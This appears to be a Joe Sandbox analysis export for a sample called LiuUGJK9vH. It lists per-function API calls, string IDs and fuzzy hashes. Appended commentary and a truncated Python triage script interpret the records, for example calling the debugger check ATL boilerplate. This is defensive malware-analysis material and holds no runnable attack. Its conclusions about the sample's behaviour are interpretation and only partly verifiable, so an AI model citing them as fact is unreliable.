                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID: DdL$DdL
                      • API String ID: 1473721057-91670653
                      • Opcode ID: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                      • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                      • Opcode Fuzzy Hash: abc62f02c208a39630d7d904ffbed26d4982310498dda772250a92240196abd9
                      • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                      APIs
                      • _memset.LIBCMT ref: 0047259E
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                      • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                      • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                      • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                      • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                      • Opcode Fuzzy Hash: 352ac0ade79c08b1e3711c999f417e7e9207a04fdee643833d7e2eb5d5c32766
                      • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                      APIs
                      • _memset.LIBCMT ref: 00462911
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 5b787c38dce0a59f34f90100e70d51444524b7953a2a3d92eef17530fa0b8ba8
                      • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                      • Opcode Fuzzy Hash: 5b787c38dce0a59f34f90100e70d51444524b7953a2a3d92eef17530fa0b8ba8
                      • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                       • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                      • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                      • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                      • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • GetWindowRect.USER32(00000000,?), ref: 00486C71
                      • GetSysColor.USER32(00000012), ref: 00486C8B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                      • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                      • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                      • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                      • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                      • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                      • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                      APIs
                      • _memset.LIBCMT ref: 00462A22
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                      • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                      • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                      • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                      • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                      • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                      • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • _wcscat.LIBCMT ref: 00444CB7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FullNamePath_memmove_wcscat
                      • String ID: SL
                      • API String ID: 257928180-181245872
                      • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                      • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                      • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                      • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                      • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                      • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                      • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                      • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                      • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                      • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                      • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                      • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                      • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0045C534
                        • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                        • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                        • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                      • VariantClear.OLEAUT32(?), ref: 0045C556
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$Init$ClearCopy_memmove
                      • String ID: d}K
                      • API String ID: 2932060187-3405784397
                      • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                      • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                      • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                      • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                      • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                      • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                      • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                      APIs
                        • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                        • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                      • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 3158253471-631824599
                      • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                      • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                      • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                      • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9
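The function records above all follow one layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them easy to parse and triage in bulk instead of reading thousands of lines by hand. The script below is an added example, not Joe Sandbox code and not part of this report: it parses that layout, decodes the SendMessageW control messages seen here (0x143 CB_ADDSTRING, 0x180 LB_ADDSTRING, 0x182 LB_DELETESTRING and so on, i.e. the AutoIt runtime's GUI control helpers rather than anything injection-related), flags WININET use, and clusters functions by Joe Sandbox's "API String ID" (the three ComboBox$ListBox records share 372448540-1403004172). It also handles one caveat worth knowing: the IsDebuggerPresent + OutputDebugStringW pair together with the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is ATL's CAtlBaseModule static initialiser from atlcore.h, so the "Contains functionality to check if a debugger is running" signature that fires on it is library boilerplate, not an anti-debug trick written by the sample's author. The SAMPLE input is constructed: four records copied from this section, abridged to their APIs, Strings and Similarity lines.

```python
"""Parse the per-function blocks of a Joe Sandbox function export (the
'APIs / Strings / Similarity' records above) and triage them.
Added example; not Joe Sandbox's own code."""
import re
from collections import defaultdict

# Constructed input: four records abridged from the report (Memory Dump
# Source lines and the "Download File" widget text dropped). Line format
# is the page's own.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
Strings
Similarity
• API ID: Internet$OpenOption
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• API String ID: 372448540-1403004172
APIs
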